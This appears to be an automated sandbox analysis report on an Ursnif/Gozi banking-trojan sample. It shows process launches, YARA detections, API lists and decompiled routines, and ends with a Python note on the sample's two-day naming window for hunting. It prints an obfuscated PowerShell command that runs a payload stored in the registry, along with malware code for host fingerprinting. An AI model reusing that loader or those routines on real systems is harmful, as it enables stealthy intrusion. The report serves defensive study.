                            General

                            Start time:10:21:47
                            Start date:14/12/2021
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                            Imagebase:0x7ff743d60000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            General

                            Start time:10:21:47
                            Start date:14/12/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff61de10000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Start time:10:21:48
                            Start date:14/12/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff61de10000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Start time:10:22:01
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
                            Imagebase:0x7ff746f40000
                            File size:2739304 bytes
                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            General

                            Start time:10:22:03
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
                            Imagebase:0x7ff746f40000
                            File size:2739304 bytes
                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            General

                            Start time:10:22:06
                            Start date:14/12/2021
                            Path:C:\Windows\System32\control.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\control.exe -h
                            Imagebase:0x7ff60c110000
                            File size:117760 bytes
                            MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Start time:10:22:06
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP"
                            Imagebase:0x7ff61bc20000
                            File size:47280 bytes
                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Start time:10:22:08
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
                            Imagebase:0x7ff746f40000
                            File size:2739304 bytes
                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            General

                            Start time:10:22:09
                            Start date:14/12/2021
                            Path:C:\Windows\System32\control.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\control.exe -h
                            Imagebase:0x7ff60c110000
                            File size:117760 bytes
                            MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, Author: CCN-CERT

                            General

                            Start time:10:22:09
                            Start date:14/12/2021
                            Path:C:\Windows\System32\control.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\control.exe -h
                            Imagebase:0x7ff60c110000
                            File size:117760 bytes
                            MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, Author: CCN-CERT

                            General

                            Start time:10:22:10
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP"
                            Imagebase:0x7ff61bc20000
                            File size:47280 bytes
                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Start time:10:22:11
                            Start date:14/12/2021
                            Path:C:\Windows\System32\control.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\control.exe -h
                            Imagebase:0x7ff60c110000
                            File size:117760 bytes
                            MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, Author: CCN-CERT

                            General

                            Start time:10:22:11
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
                            Imagebase:0x7ff746f40000
                            File size:2739304 bytes
                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            General

                            Start time:10:22:13
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP"
                            Imagebase:0x7ff61bc20000
                            File size:47280 bytes
                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Start time:10:22:15
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
                            Imagebase:0x7ff746f40000
                            File size:2739304 bytes
                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            General

                            Start time:10:22:15
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP"
                            Imagebase:0x7ff61bc20000
                            File size:47280 bytes
                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Disassembly

                            Code Analysis


                              Executed Functions

                              APIs
                              • RtlInitializeCriticalSection.NTDLL(01050488), ref: 01024DB3
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • memset.NTDLL ref: 01024DE4
                              • RtlInitializeCriticalSection.NTDLL(04B3C0A0), ref: 01024DF5
                                • Part of subcall function 010445CE: RtlInitializeCriticalSection.NTDLL(01050460), ref: 010445F2
                                • Part of subcall function 010445CE: RtlInitializeCriticalSection.NTDLL(01050440), ref: 01044608
                                • Part of subcall function 010445CE: GetVersion.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 01044619
                                • Part of subcall function 010445CE: GetModuleHandleA.KERNEL32(00001597,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 0104464D
                                • Part of subcall function 0103465E: RtlAllocateHeap.NTDLL(00000000,-00000003,77E49EB0), ref: 01034678
                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060,?,00000000,?,?,?,?,?,?,?,?,?,0103940A), ref: 01024E1E
                              • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 01024E2F
                              • CloseHandle.KERNEL32(00000768,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 01024E43
                              • GetUserNameA.ADVAPI32(00000000,?), ref: 01024E8C
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01024E9F
                              • GetUserNameA.ADVAPI32(00000000,?), ref: 01024EB4
                              • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 01024EE4
                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 01024EF9
                              • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 01024F03
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 01024F10
                              • GetShellWindow.USER32 ref: 01024F2B
                              • GetWindowThreadProcessId.USER32(00000000), ref: 01024F32
                              • memcpy.NTDLL(01050354,?,00000018,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 01024F6E
                              • CreateEventA.KERNEL32(01050244,00000001,00000000,00000000,?,00000001,?,00000000), ref: 01024FEC
                              • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 01025016
                              • OpenEventA.KERNEL32(00100000,00000000,04B3B9D0,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 0102503E
                              • CreateEventA.KERNEL32(01050244,00000001,00000000,04B3B9D0,?,00000000,?,?,?,?,?,?,?,?,?,0103940A), ref: 01025053
                              • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 01025059
                              • LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 010250F1
                              • SetEvent.KERNEL32(?,Function_000115C8,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0103940A), ref: 01025187
                              • RtlAllocateHeap.NTDLL(00000000,00000043,Function_000115C8), ref: 0102519C
                              • wsprintfA.USER32 ref: 010251CC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                              • String ID:
                              • API String ID: 3929413950-0
                              • Opcode ID: ad9d325cb3b878ee6d2c19339ca3c90922d1b22c907cc79acdc83947fba0a7a6
                              • Instruction ID: b0f6747f33c1329a79f4475472e90ce74a0710a55bce66046cad17fa2b65f947
                              • Opcode Fuzzy Hash: ad9d325cb3b878ee6d2c19339ca3c90922d1b22c907cc79acdc83947fba0a7a6
                              • Instruction Fuzzy Hash: F6C19AB45403169FC7A0DF69D88896FBBE8FB85700B40485EF5C6C7148DB3A9808CB66
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 96%
                              			E013EA303(char __eax, signed int* __esi) {
                              				long _v8;
                              				char _v12;
                              				signed int _v16;
                              				signed int _v20;
                              				signed int _v28;
                              				long _t34;
                              				signed int _t39;
                              				long _t50;
                              				char _t59;
                              				intOrPtr _t61;
                              				void* _t62;
                              				void* _t63;
                              				signed int* _t64;
                              				char _t65;
                              				intOrPtr* _t67;
                              				void* _t68;
                              				signed int* _t69;
                              
                              				_t69 = __esi;
                              				_t65 = __eax;
                              				_v8 = 0;
                              				_v12 = __eax;
                              				if(__eax == 0) {
                              					_t59 =  *0x13ed2a8; // 0xd448b889
                              					_v12 = _t59;
                              				}
                              				_t64 = _t69;
                              				E013E7855( &_v12, _t64);
                              				if(_t65 != 0) {
                              					 *_t69 =  *_t69 ^  *0x13ed2b4 ^ 0x46d76429;
                              				} else {
                              					GetUserNameW(0,  &_v8); // executed
                              					_t50 = _v8;
                              					if(_t50 != 0) {
                              						_t62 = RtlAllocateHeap( *0x13ed270, 0, _t50 + _t50);
                              						if(_t62 != 0) {
                              							if(GetUserNameW(_t62,  &_v8) != 0) {
                              								_t63 = _t62;
                              								 *_t69 =  *_t69 ^ E013E47A4(_v8 + _v8, _t63);
                              							}
                              							HeapFree( *0x13ed270, 0, _t62);
                              						}
                              					}
                              				}
                              				_t61 = __imp__;
                              				_v8 = _v8 & 0x00000000;
                              				GetComputerNameW(0,  &_v8);
                              				_t34 = _v8;
                              				if(_t34 != 0) {
                              					_t68 = RtlAllocateHeap( *0x13ed270, 0, _t34 + _t34);
                              					if(_t68 != 0) {
                              						if(GetComputerNameW(_t68,  &_v8) != 0) {
                              							_t63 = _t68;
                              							_t69[3] = _t69[3] ^ E013E47A4(_v8 + _v8, _t63);
                              						}
                              						HeapFree( *0x13ed270, 0, _t68);
                              					}
                              				}
                              				asm("cpuid");
                              				_t67 =  &_v28;
                              				 *_t67 = 1;
                              				 *((intOrPtr*)(_t67 + 4)) = _t61;
                              				 *(_t67 + 8) = _t63;
                              				 *(_t67 + 0xc) = _t64;
                              				_t39 = _v16 ^ _v20 ^ _v28;
                              				_t69[1] = _t69[1] ^ _t39;
                              				return _t39;
                              			}


                              APIs
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 013EA33A
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 013EA351
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 013EA35E
                              • HeapFree.KERNEL32(00000000,00000000), ref: 013EA37F
                              • GetComputerNameW.KERNEL32(00000000,00000000), ref: 013EA3A6
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 013EA3BA
                              • GetComputerNameW.KERNEL32(00000000,00000000), ref: 013EA3C7
                              • HeapFree.KERNEL32(00000000,00000000), ref: 013EA3E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: HeapName$AllocateComputerFreeUser
                              • String ID: Uxt
                              • API String ID: 3239747167-1536154274
                              • Opcode ID: ff00bc941894ab1b730e9d8cade9225f0e2e1a562c6a32c64fae165ff2528d93
                              • Instruction ID: 1fb3e4921e7d455aa4a43c343ee5f98a9ca32043660c590a8ede8d4616899c5e
                              • Opcode Fuzzy Hash: ff00bc941894ab1b730e9d8cade9225f0e2e1a562c6a32c64fae165ff2528d93
                              • Instruction Fuzzy Hash: 23311471A00309EFDB21DFA9D985A6EBBF9FB48314F258469E505DB280E770EA019B10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 74%
                              			E013E5C7F(intOrPtr __edx, void** _a4, void** _a8) {
                              				intOrPtr _v8;
                              				struct _FILETIME* _v12;
                              				short _v56;
                              				struct _FILETIME* _t12;
                              				intOrPtr _t13;
                              				void* _t17;
                              				void* _t21;
                              				intOrPtr _t27;
                              				long _t28;
                              				void* _t30;
                              
                              				_t27 = __edx;
                              				_t12 =  &_v12;
                              				GetSystemTimeAsFileTime(_t12);
                              				_push(0x192);
                              				_push(0x54d38000);
                              				_push(_v8);
                              				_push(_v12);
                              				L013EB02A();
                              				_push(_t12);
                              				_v12 = _t12;
                              				_t13 =  *0x13ed2b8; // 0x26ea5a8
                              				_t5 = _t13 + 0x13ee876; // 0x3ad8e1e
                              				_t6 = _t13 + 0x13ee59c; // 0x530025
                              				_push(0x16);
                              				_push( &_v56);
                              				_v8 = _t27;
                              				L013EAD4A();
                              				_t17 = CreateFileMappingW(0xffffffff, 0x13ed2e4, 4, 0, 0x1000,  &_v56); // executed
                              				_t30 = _t17;
                              				if(_t30 == 0) {
                              					_t28 = GetLastError();
                              				} else {
                              					if(GetLastError() == 0xb7) {
                              						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                              						if(_t21 == 0) {
                              							_t28 = GetLastError();
                              							if(_t28 != 0) {
                              								goto L6;
                              							}
                              						} else {
                              							 *_a4 = _t30;
                              							 *_a8 = _t21;
                              							_t28 = 0;
                              						}
                              					} else {
                              						_t28 = 2;
                              						L6:
                              						CloseHandle(_t30);
                              					}
                              				}
                              				return _t28;
                              			}


                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,013E590B,?,?,4D283A53,?,?), ref: 013E5C8B
                              • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 013E5CA1
                              • _snwprintf.NTDLL ref: 013E5CC6
                              • CreateFileMappingW.KERNELBASE(000000FF,013ED2E4,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 013E5CE2
                              • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,013E590B,?,?,4D283A53,?), ref: 013E5CF4
                              • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 013E5D0B
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,013E590B,?,?,4D283A53), ref: 013E5D2C
                              • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,013E590B,?,?,4D283A53,?), ref: 013E5D34
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                              • String ID:
                              • API String ID: 1814172918-0
                              • Opcode ID: b4670559ec4cf1354d2b558edc7200a55618ae24e5de81d2695554c0f5defd28
                              • Instruction ID: 707b202492b3e9eef34372460667334d5d99d200ba7286130dea8c58507e5e39
                              • Opcode Fuzzy Hash: b4670559ec4cf1354d2b558edc7200a55618ae24e5de81d2695554c0f5defd28
                              • Instruction Fuzzy Hash: 62218176A00318BBD731EB68DC0DF9E7BFDAB58718F104121F605EA2D5DA71D9058B60
                              Uniqueness

                              Uniqueness Score: -1.00%
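
The function whose APIs are listed above names a shared-memory object from the clock: GetSystemTimeAsFileTime is followed by _aulldiv, whose 64-bit divisor is pushed as the two dwords 54D38000 (low) and 00000192 (high), the quotient reaches _snwprintf, and CreateFileMappingW then creates a 0x1000-byte mapping with flProtect 4 (PAGE_READWRITE) that MapViewOfFile opens with access 6 (FILE_MAP_READ|FILE_MAP_WRITE). The divisor 0x0000019254D38000 is 1,728,000,000,000 FILETIME ticks of 100 ns, which is exactly 48 hours, so the name only changes every two days. The code below is an added example, not code from the report or from the sample: it assumes the dividend is the FILETIME just returned by GetSystemTimeAsFileTime (an inference from the call order) and stops at the integer, because the _snwprintf format string is not shown in the listing.

```python
from datetime import datetime, timedelta, timezone

# 64-bit divisor pushed to _aulldiv in the listing: low dword 54D38000, high dword 00000192.
DIVISOR = (0x00000192 << 32) | 0x54D38000          # == 1_728_000_000_000
TICKS_PER_SECOND = 10_000_000                       # FILETIME counts 100-ns intervals
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
ISO = "%Y-%m-%dT%H:%M:%S"                            # timestamps are taken and returned as UTC


def divisor_seconds() -> int:
    """Wall-clock length of one naming window (expected: 172800 s = 48 h)."""
    return DIVISOR // TICKS_PER_SECOND


def to_filetime(iso_utc: str) -> int:
    """UTC 'YYYY-MM-DDTHH:MM:SS' -> the value GetSystemTimeAsFileTime would return."""
    when = datetime.strptime(iso_utc, ISO).replace(tzinfo=timezone.utc)
    delta = when - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def name_bucket(iso_utc: str) -> int:
    """The quotient the sample hands to _snwprintf.

    Assumption (from the call order, not stated in the listing): the dividend is the
    FILETIME just read.  _aulldiv is unsigned 64-bit division, which // reproduces here.
    """
    return to_filetime(iso_utc) // DIVISOR


def bucket_window(bucket: int) -> tuple:
    """UTC start (inclusive) and end (exclusive) of the window that yields this bucket value."""
    start = FILETIME_EPOCH + timedelta(seconds=bucket * divisor_seconds())
    end = start + timedelta(seconds=divisor_seconds())
    return start.strftime(ISO), end.strftime(ISO)


if __name__ == "__main__":
    now = datetime.now(timezone.utc).strftime(ISO)
    b = name_bucket(now)
    print(f"bucket {b} covers {bucket_window(b)[0]}Z to {bucket_window(b)[1]}Z")
```

For a hunting rule this means the object name is a deterministic function of the date, so the bucket for the analysis day (and the neighbouring one, for runs that straddle a window boundary) is the only value that needs to be enumerated; the window boundaries fall on even multiples of two days counted from 1601-01-01 UTC, and 1970-01-01 is one of them.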

                              APIs
